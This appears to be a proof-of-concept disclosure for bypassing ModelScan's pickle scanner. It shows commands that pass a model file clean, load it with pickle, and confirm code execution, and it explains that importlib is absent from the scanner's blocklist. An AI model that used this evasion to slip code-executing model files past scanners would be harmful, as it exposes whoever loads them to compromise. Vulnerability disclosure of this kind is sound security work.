# ModelScan PickleUnsafeOpScan Bypass PoC

## Steps to Reproduce

```bash
# 1. Scan with ModelScan
modelscan -p model.bin
# Output: Issues: 0, Errors: 0, Skipped: 0

# 2. Load the model
python3 -c "import pickle; pickle.load(open('model.bin','rb'))"

# 3. Check for RCE
cat /tmp/modelscan_bypass.txt
# Output: MODELSCAN_IMPORTLIB_BYPASS_SUCCESS
```

## Technical Details

ModelScan's PickleUnsafeOpScan uses a hardcoded blacklist of unsafe modules in `unsafe_globals`. The `importlib` module is NOT in this blacklist, allowing `importlib.import_module()` to be used in pickle payloads without detection.

When the pickle is deserialized, `importlib.import_module('malice')` imports the companion `malice.py` file, executing arbitrary Python code at module import time.